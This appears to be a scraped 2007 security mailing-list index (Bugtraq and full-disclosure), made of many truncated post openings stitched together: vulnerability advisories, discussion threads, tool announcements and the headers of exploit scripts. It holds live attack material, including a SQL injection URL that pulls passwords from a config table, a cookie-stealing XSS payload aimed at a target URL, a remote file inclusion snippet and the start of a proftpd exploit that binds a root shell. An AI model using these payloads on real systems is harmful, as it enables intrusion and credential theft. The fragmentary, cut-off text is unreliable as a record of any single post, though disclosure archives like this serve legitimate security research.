#Critical Status:High
#Found By: 0x90 #Download:http://www.scriptdungeon.com/script.php?ScriptID=2844
#Greetz:all my friends
#confkey->Password
#confvalue->Username
#Table:config
#http://host.com/path/?mode=view&album=-1%20UNION%20SELECT%20confkey%20FROM%20config/*
#!/usr/bin/php
File Disclosure
# Maybe work on other versions.
# Interesting exploit =)
#
if($argc < 5) {
print("
NukeSentinel 2.5.05 (nukesentinel.php) File Disclosure Exploit
--
PHP conditions: none
CMS conditions: disable_switch<
Just fired this off to USCERT, not pretty.
Original Message
Subject: jboss vulnerability
From:[EMAIL PROTECTED]
Date:Tue, February 20, 2007 10:54 pm
To: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
Cc: "[EMAIL PROTECTED]" <[EMA
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2007:043
http://www.mandriva.com/security/
___
ESupport Multiple HTML Injection Vulnerabilities
Kayako SupportSuite offers true integrated Multi-Channel solution allowing you
to manage your emails, online issues, chats, self service and issues received
by phone. The entire system has been designed to improve productivity and
provide seamle
Scott,
On Sat, 17 Feb 2007, Cromar Scott wrote:
I have to wonder if the "old bug" complaints are coming in reference to
one of the following:
http://www.securityfocus.com/bid/3064/info
http://www.securityfocus.com/bid/5531/info
I know that my initial reaction was "haven't I seen this before?"
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[EMAIL PROTECTED] wrote:
> Please let me know if you need any further info - I have nfi who to
> actually contact as auscert has no vulnerability reporting option and this
> is a first for me...
Your best starting point might be to visit
http://www.r
> From: Nate Eldredge [mailto:[EMAIL PROTECTED]
> Sent: Friday, 16 February, 2007 21:42
>
> On Sat, 17 Feb 2007, Darren Reed wrote:
>
> >
> > Solaris's /bin/login has never supported the "-f" command line
option
> > until Solaris 10 (RTFM) so this exploit was just plain not possible.
>
> That i
This was actually found by Bl0od3r, and was posted on the 17th. Yep
you pretty much nop'ed the found by section, nice job.
http://www.milw0rm.com/exploits/3327
/str0ke
On 19 Feb 2007 19:27:31 -, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
#Critical Status:High
#Found By: 0x90 #Download:h
AdMentor Script Remote SQL injection Exploit
===
[Script Name: AdMentor admin SQL
injection
[Coded by : [EMAIL PROTECTED]
[Author : [EMAIL PROTECTED]
[Contact: [EMAIL PROTECTED]
[Dork :
Hi,
Hopefully this will help some of those with mis-configured jboss
security. Although, IMHO, jboss should limit access out of the box :-(
This is due to improperly configured admin access to jboss.
The console and web mgmt are meant to be locked down but are not done so
by default.
The follo
---
AYYILDIZ.ORG PreSents...
Script: phpXmms 1.0
Script Download: ftp://ftp.warpedsystems.sk.ca/pub/php/phpxmms-1.0.tar.gz
Contact: ilker Kandemir
Code:
include($tcmdp);
--
On Mon, 19 Feb 2007, Michael Wojcik wrote:
From: Nate Eldredge [mailto:[EMAIL PROTECTED]
Sent: Friday, 16 February, 2007 21:42
On Sat, 17 Feb 2007, Darren Reed wrote:
Solaris's /bin/login has never supported the "-f" command line
option
until Solaris 10 (RTFM) so this exploit was just plai
Hi all,
I'd like to announce the availability of a new kernel rootkit detection toolkit
for Linux called Rootkit Profiler LX (RKProfiler LX).
RKProfiler LX is divided into two parts: a data collection component called
"Rootkit Profiler Module" (RKPmod) and a data interpretation component calle
* MyCalendar multiple XSS
* By : sn0oPy
* Risk : medium
* site : http://abledesign.com/programs/MyCalendar/
* exploit :
XSS on the search menu : http://www.target.ma/calendar/index.php?go=search
XSS on the url :
http://www.target.ma/calendar/index.php?go=";>alert(document.cookie)
On 19 Feb 07, at 09:54, <[EMAIL PROTECTED]> wrote:
I am curious as to how one "automatically" logs on?
Memorized passwords.
Also, if a password is required for a subsidiary resource, the
browser will ask the user for it. In IE, at least, a sequence like
the one I describe below will pop up
[EMAIL PROTECTED] wrote:
I am curious as to how one "automatically" logs on?
1. Internet Explorer disallows username:[EMAIL PROTECTED]://192.168.1.0
2. Opera has a very clear warning that you are logging on
3. Firefox has a very clear warning that you are logging on
Are there any other methods
So what ?
Even with register_globals = On it ends with a PHP error, nothing more.
Where's your exploit? There's nothing on your site.
I may have missed something and I'd like to thank you to warn us before the
reste of the world.
--
Olivier Meunier
Team
Metaeye has released new project Zmbscap as:
The zombie scapper is an automated perl tool for detecting and stopping
distributed
denial of service programs. The tool automatically searches and scans
the desired target
for programs by looking for the ports that are used by the zombie
mast
TSRT-07-01: Trend Micro ServerProtect StCommon.dll Stack Overflow
Vulnerabilities
http://www.tippingpoint.com/security/advisories/TSRT-07-01.html
February 20, 2007
-- CVE ID:
CVE-2007-1070
-- Affected Vendor:
Trend Micro
-- Affected Products:
ServerProtect for Windows 5.58
ServerProt
MediaWiki Cross-site Scripting
Vulnerabilities.
Date:
18/02/2007
Vendor:
MediaWiki
Vulnerable versions:
MediaWiki 1.9.2 (latest) and below.
Description:
MediaWiki v1.8.2 and below are vulnerable to plain Cross-site scripting attack
by expliting the experimental AJAX features, if enabled (def
Interesting issue...
Trying various URLs for fun in one of our lab's jboss, i found the following:
http://yoursitehere:port/web-console/ (opens the web
console of Jboss)
http://yoursitehere:port/jmx-console/ (opens the jmx
console of jboss)
Most common values for port are 8
#!/usr/bin/php
URL: http://www.acid-root.new.fr/
Support us: Just click once on our publicity ;)
--
Usage: $argv[0] -url -victim [Opts]
Options: -isadmin Is the victim an Admin (1) or a normal user (default=0) ?
Suggested severity level: Medium.
Type of Risk: Denial of Service, Privilege Elevation, Un-authorize Access.
Affected Software: VMware Workstation, version 5.5.3 build 34685 (including
installation of "VMware Tools" of the same version, in the guest OS).
(Older versions and other products by
[EMAIL PROTECTED] wrote:
There's a new advisory at:
http://www.infohacking.com/INFOHACKING_RESEARCH/Our_Advisories/apache/index.html
Summarizing:
"1.- HTTP 404 error response almost arbitrary injection (Apache)
Impact right now:
a) fake virus injection in Apache 404 HTTP responses wich can le
#!/usr/bin/perl -w
# Local Exploit
#
# [ Exploitation condition ]
# - proftpd must be compiled with --enable-ctrls option
# - local user needs permission to connect through unix socket (from
proftpd.conf)
#
# This one works for 2.6 exploitation against gcc 4.x
# Payload will bind /bin/sh o
Advisory : H0tTurk-
Product : qwik-smtpd (latest version).
Vendor: http://qwikmail.sourceforge.net/
Bug : format string vulnerability
Vendor Status : Released Patch.
http://qwikmail.sourceforge.net/smtpd/qwik-smtpd-0.3.patch
--
===
Ubuntu Security Notice USN-423-1 February 20, 2007
moin, moin1.3 vulnerabilities
CVE-2007-0901, CVE-2007-0902
===
A security issue affects the following Ubuntu releases:
U
TSRT-07-02: Trend Micro ServerProtect eng50.dll Stack Overflow
Vulnerabilities
http://www.tippingpoint.com/security/advisories/TSRT-07-02.html
February 20, 2007
-- CVE ID:
CVE-2007-1070
-- Affected Vendor:
Trend Micro
-- Affected Products:
ServerProtect for Windows 5.58
ServerProtect
> From: Michal Zalewski [mailto:[EMAIL PROTECTED]
> Sent: Friday, 16 February, 2007 17:51
> To: bugtraq@securityfocus.com
> Cc: full-disclosure@lists.grok.org.uk
>
> Firefox suffers from a design flaw that can be used to confuse casual
> users and evoke a false sense of authority when visiting a
On Feb 12th 2007, Gadi Evron wrote:
> Most web servers are being compromised by these attacks as a result of an
> insecure web application written in PHP, although attacks for other
> scripting languages such as Perl and ASP are also in-the-wild.
>
> The main reason for this is that many different
On 2/19/07, [EMAIL PROTECTED] < [EMAIL PROTECTED]> wrote:
I am curious as to how one "automatically" logs on?
There are several potential methods (depending on the victim's browser):
1) Older versions of Flash allow the spoofing of arbitrary http
headers [1] thus allowing the creation of attack
32 matches
Mail list logo
